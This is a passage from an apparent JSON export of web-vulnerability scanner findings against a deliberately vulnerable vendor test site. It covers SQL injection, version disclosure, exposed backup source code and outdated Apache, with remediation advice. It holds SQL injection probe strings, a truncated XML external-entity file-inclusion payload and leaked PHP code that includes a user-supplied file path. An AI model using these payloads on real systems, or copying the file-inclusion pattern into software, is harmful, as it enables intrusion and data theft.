    40 JOHNNY CAGE 2012-03-13 12:14:54 22
    41 JODIE DEGENERES 2012-03-13 12:14:54 22
    42 TOM MIRANDA 2012-03-13 12:14:54 22
    43 KIRK JOVOVICH 2012-03-13 12:14:54 22
    44 NICK STALLONE 2012-03-13 12:14:54 22
    45 REESE KILMER 2012-03-13 12:14:54 22
    46 PARKER GOLDBERG 2012-03-13 12:14:54 22
    47 JULIA BARRYMORE 2012-03-13 12:14:54 22
    48 FRANCES DAY-LEWIS 2012-03-13 12:14:54 22
    49 ANNE CRONYN 2012-03-13 12:14:54 22
    50 NATALIE HOPKINS 2012-03-13 12:14:54 22
    51 GARY PHOENIX 2012-03-13 12:14:54 22
    52 CARMEN HUNT 2012-03-13 12:14:54 22
    53 MENA TEMPLE 2012-03-13 12:14:54 22
    54 PENELOPE PINKETT 2012-03-13 12:14:54 22
    55 FAY KILMER 2012-03-13 12:14:54 22
    56 DAN HARRIS 2012-03-13 12:14:54 22
    57 JUDE CRUISE 2012-03-13 12:14:54 22
    58 CHRISTIAN AKROYD 2012-03-13 12:14:54 22
    59 DUSTIN TAUTOU 2012-03-13 12:14:54 22
    60 HENRY BERRY 2012-03-13 12:14:54 22
    61 CHRISTIAN NEESON 2012-03-13 12:14:54 22
    62 JAYNE NEESON 2012-03-13 12:14:54 22
    63 CAMERON WRAY 2012-03-13 12:14:54 22
    64 RAY JOHANSSON 2012-03-13 12:14:54 22
    65 ANGELA HUDSON 2012-03-13 12:14:54 22
    66 MARY TANDY 2012-03-13 12:14:54 22
    67 JESSICA BAILEY 2012-03-13 12:14:54 22
    68 RIP WINSLET 2012-03-13 12:14:54 22
    69 KENNETH PALTROW 2012-03-13 12:14:54 22
    70 MICHELLE MCCONAUGHEY 2012-03-13 12:14:54 22
    71 ADAM GRANT 2012-03-13 12:14:54 22
    72 SEAN WILLIAMS 2012-03-13 12:14:54 22
    73 GARY PENN 2012-03-13 12:14:54 22
    74 MILLA KEITEL 2012-03-13 12:14:54 22
    75 BURT POSEY 2012-03-13 12:14:54 22
    76 ANGELINA ASTAIRE 2012-03-13 12:14:54 22
    77 CARY MCCONAUGHEY 2012-03-13 12:14:54 22
    78 GROUCHO SINATRA 2012-03-13 12:14:54 22
    79 MAE HOFFMAN 2012-03-13 12:14:54 22
    80 RALPH CRUZ 2012-03-13 12:14:54 22
    81 SCARLETT DAMON 2012-03-13 12:14:54 22
    82 WOODY JOLIE 2012-03-13 12:14:54 22
    83 BEN WILLIS 2012-03-13 12:14:54 22
    84 JAMES PITT 2012-03-13 12:14:54 22
    85 MINNIE ZELLWEGER 2012-03-13 12:14:54 22
    86 GREG CHAPLIN 2012-03-13 12:14:54 22
    87 SPENCER PECK 2012-03-13 12:14:54 22
    88 KENNETH PESCI 2012-03-13 12:14:54 22
    89 CHARLIZE DENCH 2012-03-13 12:14:54 22
    90 SEAN GUINESS 2012-03-13 12:14:54 22
    91 CHRISTOPHER BERRY 2012-03-13 12:14:54 22
    92 KIRSTEN AKROYD 2012-03-13 12:14:54 22
    93 ELLEN PRESLEY 2012-03-13 12:14:54 22
    94 KENNETH TORN 2012-03-13 12:14:54 22
    95 DARYL WAHLBERG 2012-03-13 12:14:54 22
    96 GENE WILLIS 2012-03-13 12:14:54 22
    97 MEG HAWKE 2012-03-13 12:14:54 22
    98 CHRIS BRIDGES 2012-03-13 12:14:54 22
    99 JIM MOSTEL 2012-03-13 12:14:54 22
    100 SPENCER DEPP 2012-03-13 12:14:54 22
    101 SUSAN DAVIS 2012-03-13 12:14:54 22
    102 WALTER TORN 2012-03-13 12:14:54 22
    103 MATTHEW LEIGH 2012-03-13 12:14:54 22
    104 PENELOPE CRONYN 2012-03-13 12:14:54 22
    105 SIDNEY CROWE 2012-03-13 12:14:54 22
    106 GROUCHO DUNST 2012-03-13 12:14:54 22
    107 GINA DEGENERES 2012-03-13 12:14:54 22
    108 WARREN NOLTE 2012-03-13 12:14:54 22
    109 SYLVESTER DERN 2012-03-13 12:14:54 22
    110 SUSAN DAVIS 2012-03-13 12:14:54 22
    111 CAMERON ZELLWEGER 2012-03-13 12:14:54 22
    112 RUSSELL BACALL 2012-03-13 12:14:54 22
    113 MORGAN HOPKINS 2012-03-13 12:14:54 22
    114 MORGAN MCDORMAND 2012-03-13 12:14:54 22
    115 HARRISON BALE 2012-03-13 12:14:54 22
    116 DAN STREEP 2012-03-13 12:14:54 22
    117 RENEE TRACY 2012-03-13 12:14:54 22
    118 CUBA ALLEN 2012-03-13 12:14:54 22
    119 WARREN JACKMAN 2012-03-13 12:14:54 22
    120 PENELOPE MONROE 2012-03-13 12:14:54 22
    121 LIZA BERGMAN 2012-03-13 12:14:54 22
    122 SALMA NOLTE 2012-03-13 12:14:54 22
    123 JULIANNE DENCH 2012-03-13 12:14:54 22
    124 SCARLETT BENING 2012-03-13 12:14:54 22
    125 ALBERT NOLTE 2012-03-13 12:14:54 22
    126 FRANCES TOMEI 2012-03-13 12:14:54 22
    127 KEVIN GARLAND 2012-03-13 12:14:54 22
    128 CATE MCQUEEN 2012-03-13 12:14:54 22
    129 DARYL CRAWFORD 2012-03-13 12:14:54 22
    130 GRETA KEITEL 2012-03-13 12:14:54 22
    131 JANE JACKMAN 2012-03-13 12:14:54 22
    132 ADAM HOPPER 2012-03-13 12:14:54 22
    133 RICHARD PENN 2012-03-13 12:14:54 22
    134 GENE HOPKINS 2012-03-13 12:14:54 22
    135 RITA REYNOLDS 2012-03-13 12:14:54 22
    136 ED MANSFIELD 2012-03-13 12:14:54 22
    137 MORGAN WILLIAMS 2012-03-13 12:14:54 22
    138 LUCILLE DEE 2012-03-13 12:14:54 22
    139 EWAN GOODING 2012-03-13 12:14:54 22
    140 WHOOPI HURT 2012-03-13 12:14:54 22
    141 CATE HARRIS 2012-03-13 12:14:54 22
    142 JADA RYDER 2012-03-13 12:14:54 22
    143 RIVER DEAN 2012-03-13 12:14:54 22
    144 ANGELA WITHERSPOON 2012-03-13 12:14:54 22
    145 KIM ALLEN 2012-03-13 12:14:54 22
    146 ALBERT JOHANSSON 2012-03-13 12:14:54 22
    147 FAY WINSLET 2012-03-13 12:14:54 22
    148 EMILY DEE 2012-03-13 12:14:54 22
    149 RUSSELL TEMPLE 2012-03-13 12:14:54 22
    150 JAYNE NOLTE 2012-03-13 12:14:54 22
    151 GEOFFREY HESTON 2012-03-13 12:14:54 22
    152 BEN HARRIS 2012-03-13 12:14:54 22
    153 MINNIE KILMER 2012-03-13 12:14:54 22
    154 MERYL GIBSON 2012-03-13 12:14:54 22
    155 IAN TANDY 2012-03-13 12:14:54 22
    156 FAY WOOD 2012-03-13 12:14:54 22
    157 GRETA MALDEN 2012-03-13 12:14:54 22
    158 VIVIEN BASINGER 2012-03-13 12:14:54 22
    159 LAURA BRODY 2012-03-13 12:14:54 22
    160 CHRIS DEPP 2012-03-13 12:14:54 22
    161 HARVEY HOPE 2012-03-13 12:14:54 22
    162 OPRAH KILMER 2012-03-13 12:14:54 22
    163 CHRISTOPHER WEST 2012-03-13 12:14:54 22
    164 HUMPHREY WILLIS 2012-03-13 12:14:54 22
    165 AL GARLAND 2012-03-13 12:14:54 22
    166 NICK DEGENERES 2012-03-13 12:14:54 22
    167 LAURENCE BULLOCK 2012-03-13 12:14:54 22
    168 WILL WILSON 2012-03-13 12:14:54 22
    169 KENNETH HOFFMAN 2012-03-13 12:14:54 22
    170 MENA HOPPER 2012-03-13 12:14:54 22
    171 OLYMPIA PFEIFFER 2012-03-13 12:14:54 22
    172 GROUCHO WILLIAMS 2012-03-13 12:14:54 22
    173 ALAN DREYFUSS 2012-03-13 12:14:54 22
    174 MICHAEL BENING 2012-03-13 12:14:54 22
    175 WILLIAM HACKMAN 2012-03-13 12:14:54 22
    176 JON CHASE 2012-03-13 12:14:54 22
    177 GENE MCKELLEN 2012-03-13 12:14:54 22
    178 LISA MONROE 2012-03-13 12:14:54 22
    179 ED GUINESS 2012-03-13 12:14:54 22
    180 JEFF SILVERSTONE 2012-03-13 12:14:54 22
    181 MATTHEW CARREY 2012-03-13 12:14:54 22
    182 DEBBIE AKROYD 2012-03-13 12:14:54 22
    183 RUSSELL CLOSE 2012-03-13 12:14:54 22
    184 HUMPHREY GARLAND 2012-03-13 12:14:54 22
    185 MICHAEL BOLGER 2012-03-13 12:14:54 22
    186 JULIA ZELLWEGER 2012-03-13 12:14:54 22
    187 RENEE BALL 2012-03-13 12:14:54 22
    188 ROCK DUKAKIS 2012-03-13 12:14:54 22
    189 CUBA BIRCH 2012-03-13 12:14:54 22
    190 AUDREY BAILEY 2012-03-13 12:14:54 22
    191 GREGORY GOODING 2012-03-13 12:14:54 22
    192 JOHN SUVARI 2012-03-13 12:14:54 22
    193 BURT TEMPLE 2012-03-13 12:14:54 22
    194 MERYL ALLEN 2012-03-13 12:14:54 22
    195 JAYNE SILVERSTONE 2012-03-13 12:14:54 22
    196 BELA WALKEN 2012-03-13 12:14:54 22
    197 REESE WEST 2012-03-13 12:14:54 22
    198 MARY KEITEL 2012-03-13 12:14:54 22
    199 JULIA FAWCETT 2012-03-13 12:14:54 22
    200 THORA TEMPLE 2012-03-13 12:14:54 22
    412 -1 OR 1=1 test 2012-03-13 12:14:54 22
    413 -1 OR 1=1 test 2012-03-13 12:14:54 22
    414 NS1NO test 2012-03-13 12:14:54 22
    415 1 AND 'NS='ss test 2012-03-13 12:14:54 22
    416 ' OR 'ns'='ns test 2012-03-13 12:14:54 22
    417 -1 OR 17-7=10 test 2012-03-13 12:14:54 22
    418 1 OR X='ss test 2012-03-13 12:14:54 22
    419 ' OR '1'='1 test 2012-03-13 12:14:54 22
    420 ' OR '1'='1 test 2012-03-13 12:14:54 22

    \n\n\t\t\t\t
    \n\t\t\t
    \n\t\t
     
    \n\t\t
    \n\t\t\n\t \n\t
    \n\t\t\t
      \n\t\t\t\t
    • \n\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\n\t\t\t\t\t
      \n\t\t\t\t\t
       
      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Tags

      \n\t\t\t\t\t

      netsparker xss web-application-security false-positive-free automated-exploitation sql-injection local/remote-file-inclusion

      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Inner Pages

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Links

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t
    \n\t\t
    \t\t\n\t\t
     
    \n\t
    \n\t
    \n\t
    \n\t\n
    \n\n
    \n\tThis website is automatically reset at every midnight (00:00 - UTC).\n
    \n
    \n\t\t

    Copyright (c) 2010 testsparker.com. All rights reserved. Design by Free CSS Templates.

    \n\t
    \t\n\n\n", + "Duration": 180.5509, + "StatusCode": 200 + }, + "LookupId": "dbd0a5a8-18d2-471a-7b37-ad490211f0f0", + "Impact": "
    Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:\n
      \n
    • Reading, updating and deleting arbitrary data/tables from the database
    • \n
    • Executing commands on the underlying operating system
    • \n
    \n
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 02:01 AM", + "Name": "Boolean Based SQL Injection", + "ProofOfConcept": "", + "RemedialActions": "
    \n
      \n
    1. See the remedy for solution.
    2. \n
    3. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
    4. \n
    5. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
    6. \n
    7. Use your weblogs and application logs to see if there were any previous but undetected attacks to this resource.
    8. \n
    \n
    ", + "RemedialProcedure": "
    The best way to protect your code against SQL injections is using parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
    ", + "RemedyReferences": "", + "Severity": "Critical", + "State": "Revived", + "Type": "ConfirmedBooleanSqlInjection", + "Url": "http://php.testsparker.com/artist.php?id=-1%20OR%2017-7%3d10" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.18.1.3", + "Capec": "170", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "205", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "45" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise identified a version disclosure (Apache) in the target web server's HTTP response.

    \n

    This information might help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + }, + { + "Name": "Extracted Version", + "Value": "2.2.8" + } + ], + "FirstSeenDate": "15/06/2021 01:44 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "fbb65b68-873e-4fff-871d-ad48024dd60f", + "Impact": "
    An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Version Disclosure (Apache)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "ApacheVersionDisclosure", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.18.1.3", + "Capec": "170", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "205", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "45" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise identified a version disclosure (PHP) in target web server's HTTP response.

    \n

    This information can help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + }, + { + "Name": "Extracted Version", + "Value": "5.2.6" + } + ], + "FirstSeenDate": "15/06/2021 01:44 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "d765b64b-8f6a-4343-872d-ad48024dd723", + "Impact": "
    An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Version Disclosure (PHP)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "PhpVersionDisclosure", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 50, + "Classification": { + "Iso27001": "A.18.1.3", + "Capec": "87", + "Cvss": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "7.5" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "7.5" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "7.5" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + "Cvss31": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "7.5" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "7.5" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "7.5" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + "Cwe": "530", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A7", + "OwaspProactiveControls": "", + "Pci32": "6.5.8", + "Wasc": "34" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise detected backup source code on your web server.

    <?php\nrequire("auth.php");\nini_set("display_errors","0");\n\n//global configuration area\n$globals["title"] = "Netsparker Test Web Site -  PHP";\nfunction EndsWith($FullStr, $EndStr)\n{\n    // Get the length of the end string\n    $StrLen = strlen($EndStr);\n    // Look at the end of FullStr for the substring the size of EndStr\n    $FullStrEnd = substr($FullStr, strlen($FullStr) - $StrLen);\n    // If it matches, it does end with EndStr\n    return $FullStrEnd == $EndStr;\n}\n?>\n…\n<?php include "Internals/header.php"?>\n…\n<?php include "Internals/upmenu.php"?>\n…\n<?php\n            $file = $_REQUEST["file"];\n            if(EndsWith($file,".nsp"))\n                include $_REQUEST["file"];\n        ?>\n…\n<?php include "Internals/footer.php"?>
    ", + "ExploitationSkills": "
    This is dependent on the information obtained from source code. Uncovering these forms of vulnerabilities does not require high levels of skills. However, a highly skilled attacker could leverage this form of vulnerability to obtain account information for databases or administrative panels, ultimately leading to control of the application or even the host the application resides on.
    ", + "ExternalReferences": "", + "ExtraInformation": [], + "FirstSeenDate": "24/06/2021 10:07 AM", + "HttpRequest": { + "Content": "POST /process.bak HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nContent-Length: 124\r\nContent-Type: application/xml\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.bak\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n]>&lfi;", + "Method": "POST", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 834\r\nLast-Modified: Thu, 30 Jul 2020 08:09:20 GMT\r\nAccept-Ranges: bytes\r\nContent-Type: text/plain\r\nDate: Thu, 24 Jun 2021 22:55:27 GMT\r\nETag: \"1200000001ba62-342-5aba4307c6c00\"\r\n\r\n\n\n\n\n
    \n \n\t \n\t\n
    \n\n\n\t\n\n\n", + "Duration": 20.6716, + "StatusCode": 200 + }, + "LookupId": "3937a826-c79e-4b14-7696-ad5101871463", + "Impact": "
    Depending on the nature of the source code disclosed, an attacker can mount one or more of the following types of attacks:\n
      \n
    • Access the database or other data resources. With the privileges of the account obtained, attempt to read, update or delete arbitrary data from the database.
    • \n
    • Access password protected administrative mechanisms such as \"dashboard\", \"management console\" and \"admin panel\" potentially leading to full control of the application.
    • \n
    • Develop further attacks by investigating the source code for input validation errors and logic vulnerabilities.
    • \n
    \n
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:55 AM", + "Name": "Backup Source Code Detected", + "ProofOfConcept": "", + "RemedialActions": "
    \n

    Remove all temporary and backup files.

    \n
    ", + "RemedialProcedure": "", + "RemedyReferences": "", + "Severity": "High", + "State": "Revived", + "Type": "BackupSourceCodeFound", + "Url": "http://php.testsparker.com/process.bak" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.1.2", + "Capec": "310", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "829", + "Hipaa": "164.308(a)(1)(i)", + "Owasp": "A9", + "OwaspProactiveControls": "C1", + "Pci32": "6.2", + "Wasc": "" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise identified you are using an out-of-date version of Apache.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "2.2.8" + }, + { + "Name": "Latest Version", + "Value": "2.4.48" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 06/18/2021 12:00:00 vulnerability database content." + }, + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "15/06/2021 01:44 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "0e4d0f49-8783-4b29-8718-ad48024dd57e", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "KnownVulnerabilities": [ + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Numeric Errors Vulnerability" + }, + { + "Severity": "Low", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Low", + "Title": "Apache HTTP Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "Apache HTTP Server Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Configuration Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Configuration Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server DEPRECATED: Code Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Neutralization of CRLF Sequences ('CRLF Injection') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "Apache HTTP Server Improper Authentication Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Use After Free Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation 